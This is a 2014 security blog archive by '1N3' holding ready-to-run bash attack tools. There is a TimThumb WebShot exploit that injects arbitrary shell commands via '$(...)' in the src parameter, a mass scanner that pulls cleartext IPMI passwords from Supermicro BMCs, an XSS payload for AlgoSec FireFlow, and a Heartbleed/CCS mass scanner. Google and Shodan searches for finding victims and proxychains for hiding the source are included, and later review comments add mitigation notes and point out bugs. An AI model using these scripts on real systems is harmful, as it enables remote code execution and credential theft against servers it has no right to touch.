Friday, June 27, 2014

TimThumb WebShot Code Execution Exploit (0-day)

 


#!/bin/bash
# Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3
# (c) http://treadstonesecurity.blogspot.ca
# Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# ABOUT:
# TimThumb's "Webshot" feature allows certain commands to be executed on the
# vulnerable website remotely (no authentication required). With a simple command, an
# attacker can create, remove and modify any files on your server. TimThumb 2.8.11-2.8.13
# with the WEBSHOT_ENABLED option enabled appear to be vulnerable.
#
# MITIGATION / DETECTION (review):
# - The precondition this script depends on, per the ABOUT section, is WEBSHOT_ENABLED being
#   on in an affected TimThumb version; turning that option off (or removing timthumb.php)
#   removes the condition tested here.
# - Every request sent below carries the query parameters "webshot=1" and "src=", with the
#   src value containing "$(" (see the echo lines that print each request); web-server
#   access logs can be searched for that combination to find attempts.
#
# USAGE:
# ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# NOTE: proxy and command fields are optional.
# NOTE (review): the Usage line says "sh ...", but the tests below use "==" inside "[ ]",
# a bash extension; run the script with bash as the shebang indicates, not a POSIX sh.
#
# EXAMPLE:
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'

# BANNER: clear the terminal and print the header.
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"
echo ""

# VARS
# Tool lookups via `which` (empty string when the tool is not on PATH; `command -v` is the
# portable form). UNICORNSCAN is looked up but never used anywhere in this script.
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1      # host or domain name, or the literal "google" (see below)
BASE_PATH=$2   # URL path to timthumb.php on the target
PROXY=$3       # the literal "proxy" runs curl under proxychains
COMMAND=$4     # optional command string, spliced into the src parameter verbatim

# REQUIREMENTS
# NOTE (review): the message says the scan continues without proxy support, but the script
# exits here, so proxychains is effectively mandatory even when $3 is not "proxy".
if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

# Both positional arguments are required; the proxy/command fields are not checked here.
if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then
    echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"
    exit
fi

# NOTE (review): $TARGET is unquoted in this test; a value containing spaces or glob
# characters breaks it. It is already known to be non-empty from the check above.
if [ $TARGET == "google" ]; then
# USE GOOGLE HACKING TO FIND VULNERABLE SERVERS
# Only opens a browser with a fixed search query in the background and exits; nothing is
# sent to any target from this script in this mode.
    echo "Searching Google..."
    iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED -- identical to the direct branch below except that curl runs under proxychains.
    echo "(--==== Scanning via proxy..."

    # NOTE (review): $COMMAND is unquoted in this test; a multi-word value makes "[" fail
    # with an argument error instead of being treated as non-empty.
    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        # The request URL is printed first, then fetched. The response is filtered to lines
        # containing "version" (presumably to spot a version line in the reply); the output
        # of the injected command itself is not displayed.
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        # $COMMAND is spliced into the single-quoted URL unquoted and without URL-encoding;
        # because the whole URL argument is unquoted, a value containing spaces is split into
        # separate curl arguments (the header examples contain no spaces).
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit

else
# NO PROXY -- same flow as the proxy branch above, without proxychains.
    echo "(--==== Scanning via direct connection..."

    # NOTE (review): same unquoted $COMMAND test as above.
    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND (same splicing caveat as in the proxy branch)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit
fi

# NOTE (review): unreachable -- both branches above end in "exit", so this is never printed.
echo ""
echo "(--==== Scan Complete!"
exit

Saturday, June 21, 2014

Supermicro IPMI/BMC Cleartext Password Scanner


#!/bin/bash
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh supermicro_scan.sh <CIDR|IP|shodan> [proxy]
# NOTE (review): the keyword compared below is spelled exactly "shodan".
# NOTE (review): the Usage line says "sh ...", but the tests below use "==" inside "[ ]",
# a bash extension; run the script with bash as the shebang indicates.
#
# ABOUT:
# Supermicro's implementation of IPMI/BMC allows remote, unauthenticated attackers to
# request the file PSBlock via port 49152. This plain text password file contains IPMI
# username and password information. This script allows users to scan their networks to
# check for vulnerable systems that require patching.
#
# REVIEW NOTES (defensive use):
# - The output of this script is sensitive: a successfully fetched PSBlock is printed
#   through `strings`, i.e. the credentials themselves are written to the terminal. Do not
#   store or share scan output unredacted.
# - The fix is BMC firmware patching (as the ABOUT section says); until then, restricting
#   who can reach 49152/tcp on BMC interfaces reduces exposure.
#
# USAGE:
# ./supermicro_scan.sh 74.200.8.237 - Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy
# ./supermicro_scan.sh shodan - Search for vulnerable servers on ShodanHQ
#

# BANNER: clear the terminal and print the header.
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"
echo ""

# Tool lookups via `which` (empty string when the tool is not on PATH; `command -v` is
# the portable form).
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1   # CIDR range, single IP, or the literal "shodan"
PROXY=$2    # the literal "proxy" runs curl under proxychains

# REQUIREMENTS
if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

# NOTE (review): the message says the scan continues without proxy support, but the script
# exits here, so proxychains is effectively mandatory even when $2 is not "proxy".
if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

# Argument check runs after the tool checks, so a missing tool is reported before a
# missing argument.
if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> [proxy]"
    exit
fi

# NOTE (review): $TARGET is unquoted in this test; it is known non-empty from the check above.
if [ $TARGET == "shodan" ]; then
# SCAN USING SHODANHQ SEARCH
# Only opens a browser with a fixed search in the background and exits; nothing is scanned
# by this script in this mode.
    echo "Searching ShowdanHQ..."
    iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED -- identical to the direct branch below except that curl runs under proxychains.
    echo "(--==== Scanning via proxy..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    # Hosts are taken from field 5 of unicornscan's output for port 49152 (unicornscan itself
    # is NOT proxied here, only curl is); presumably that field is the responding address --
    # confirm against the installed unicornscan's output format. unicornscan errors are discarded.
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        # curl: 3 s overall timeout (-m 3), one retry, fail silently on HTTP errors (-f),
        # progress bar (-#). A fetched PSBlock is piped through `strings`, so this is the
        # point where credentials are written to the terminal.
        proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

else
# NO PROXY -- same loop as above, without proxychains.
    echo "(--==== Scanning via direct connection..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

fi

# NOTE (review): unreachable -- both branches above end in "exit", so this is never printed.
echo ""
echo "(--==== Scan Complete!"
exit

Monday, June 9, 2014

AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws


x---==== Exploit Title: AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws
x---==== Date: Mon Jun 9 2014
x---==== Author: 1N3
x---==== Homepage: http://treadstonesecurity.blogspot.ca
x---==== Software Link: http://www.algosec.com/en/products_solutions/products/fireflow
x---==== Version: 6.3 (Other versions may also be susceptible)

x---==== Vulnerability
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflected XSS and HTML injection attacks. This may allow attackers to execute arbitrary JavaScript on behalf of other logged-in users of the system by placing XSS code in their signature.

x---==== Vulnerable URL:
https://fireflowhostname.com/FireFlow/SelfService/Prefs.html

x---==== XSS Code:
<script>alert(document.cookie)</script>

Friday, June 6, 2014

OpenSSL CCS & HeartBleed Mass Scanner


#!/bin/bash
# MassBleed OpenSSL Scanner v20140609 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# ABOUT:
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
#
# PROXY USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# VULNERABILITIES:
# 1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
# 2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
#
# REQUIREMENTS:
# Is the heartbleed POC present?
# Is the openssl CCS script present?
# Is unicornscan installed?
# Is nmap installed?
#
# REVIEW NOTES:
# - Item 3 above says single-host mode covers ports 1-10000, but PORT_RANGE below is "1-65000".
# - The Usage line says "sh ..."; the script uses "==" inside "[ ]" and the {1..254} brace
#   expansion, which are bash features, so run it with bash as the shebang indicates.
# - In both the proxy and direct branches, the "port" test is followed by an "else" that is
#   taken for EVERY other SCAN_TYPE, so a "single" or "subnet" run is followed by the default
#   443 scan of $RANGE as well (see the comments at those else lines).
# - In the proxied "subnet" branch the CCS check runs `perl heartbleed.py`; every other CCS
#   line calls openssl_ccs.pl, so that line presumably was meant to call openssl_ccs.pl and,
#   as written, the CCS test does not run in that mode.
# - The result filters (`grep vulnerable`, `grep affected`) depend on the exact wording printed
#   by the two downloaded PoC scripts; a revision that words its output differently prints
#   nothing here, which is indistinguishable from "not vulnerable".
# - unicornscan is run without a proxy in the direct branch, and under proxychains in the
#   proxy branch (UDP/raw-socket scanning through a SOCKS proxy may not behave as expected --
#   verify with your proxychains setup).

echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== MassBleed OpenSSL Scanner by 1N3"
echo ""

# Presence checks via `ls` output (stderr is not suppressed, so a missing file also prints an
# ls error before the message below); `[ -f heartbleed.py ]` is the idiomatic test.
HEARTBLEED=`ls heartbleed.py`
OPENSSL_CCS=`ls openssl_ccs.pl`
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`     # checked below but not used by any scan in this script
RANGE=$1              # CIDR, single IP, or a class-C prefix ending in "." for "subnet" mode
SCAN_TYPE=$2          # single | port | subnet | anything else => default 443 scan
CUSTOM_PORT=$3        # port for "port" mode; also honoured by proxied "single" mode when not "0"
PROXY=$4              # the literal "proxy" runs unicornscan and the PoCs under proxychains
PORT_RANGE="1-65000"  # ports probed in "single" mode (the header says 1-10000)

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford (https://gist.github.com/sh1n0b1/10100394) and place in same directory named: heartbleed.py"
    exit
fi

if [ "$OPENSSL_CCS" != "openssl_ccs.pl" ]; then
    echo "(--==== openssl_ccs.pl not found!"
    echo "(--==== To fix, download the script from RedHat (https://access.redhat.com/labs/ccsinjectiontest/) and place in same directory named: openssl_ccs.pl"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

if [ "$NMAP" == "" ]; then
    echo "(--==== Nmap not installed! Exiting..."
    exit
fi

# Only the first argument is validated; SCAN_TYPE, CUSTOM_PORT and PROXY are not checked.
if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

if [ "$PROXY" = "proxy" ]; then
    echo "(--==== Scanning via proxy..."
    if [ "$SCAN_TYPE" = "single" ]; then
        # With $3 other than "0", only that one port is tested; otherwise every port in
        # PORT_RANGE that unicornscan reports open is tested. NOTE (review): an omitted $3 is
        # "" which is also != "0", so the shortcut is taken with an empty port -- pass 0 as in
        # the header examples. The direct branch below has no single-port shortcut at all.
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking HeartBleed: $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep vulnerable
            echo "(--==== Checking OpenSSL CCS: $RANGE:$CUSTOM_PORT" && proxychains perl openssl_ccs.pl $RANGE $CUSTOM_PORT | grep affected;
        else
            # Open ports are parsed from field 4 of unicornscan's output, keeping the text
            # before ']' -- presumably the port token; confirm against the installed
            # unicornscan's output format.
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "(--==== Checking HeartBleed $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS $RANGE:"$a && proxychains perl openssl_ccs.pl $RANGE $a | grep affected;
            done;
        fi
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        # Iterates hosts .1-.254 of the class-C prefix in $RANGE (which must end in ".").
        # -mT and -r500 are passed through to unicornscan (presumably scan mode and packet
        # rate -- confirm against its manual).
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "(--==== $RANGE$a:$b"
                echo "(--==== Checking HeartBleed:" && proxychains python heartbleed.py $RANGE$a -p $b | grep vulnerable
                # NOTE (review): runs heartbleed.py via perl; every other CCS line calls
                # openssl_ccs.pl, so this CCS check presumably does not run as intended.
                echo "(--==== Checking OpenSSL CCS:" && proxychains perl heartbleed.py $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        # Hosts with $CUSTOM_PORT open are taken from field 6 of unicornscan's output --
        # presumably the address column; confirm against the installed version's format.
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && proxychains perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        # NOTE (review): this else belongs to the "port" test only, so it also runs after the
        # "single" and "subnet" blocks above have finished: a default 443 scan of $RANGE.
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && proxychains python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && proxychains perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
else
    # DIRECT CONNECTION -- mirrors the proxy branch without proxychains, except that "single"
    # mode has no single-port shortcut here (CUSTOM_PORT is ignored in this mode).
    if [ "$SCAN_TYPE" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do
                echo "(--==== Checking HeartBleed $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep vulnerable
                echo "(--==== Checking OpenSSL CCS $RANGE:"$a && perl openssl_ccs.pl $RANGE $a | grep affected
        done;
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "$RANGE$a:$b"
                    echo "(--==== Checking HeartBleed:" && python heartbleed.py $RANGE$a -p $b | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS:" && perl openssl_ccs.pl $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        # NOTE (review): as in the proxy branch, this else is taken for every SCAN_TYPE other
        # than "port", so "single" and "subnet" runs are followed by a 443 scan of $RANGE.
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
fi

echo "(--==== Scan Complete!"
exit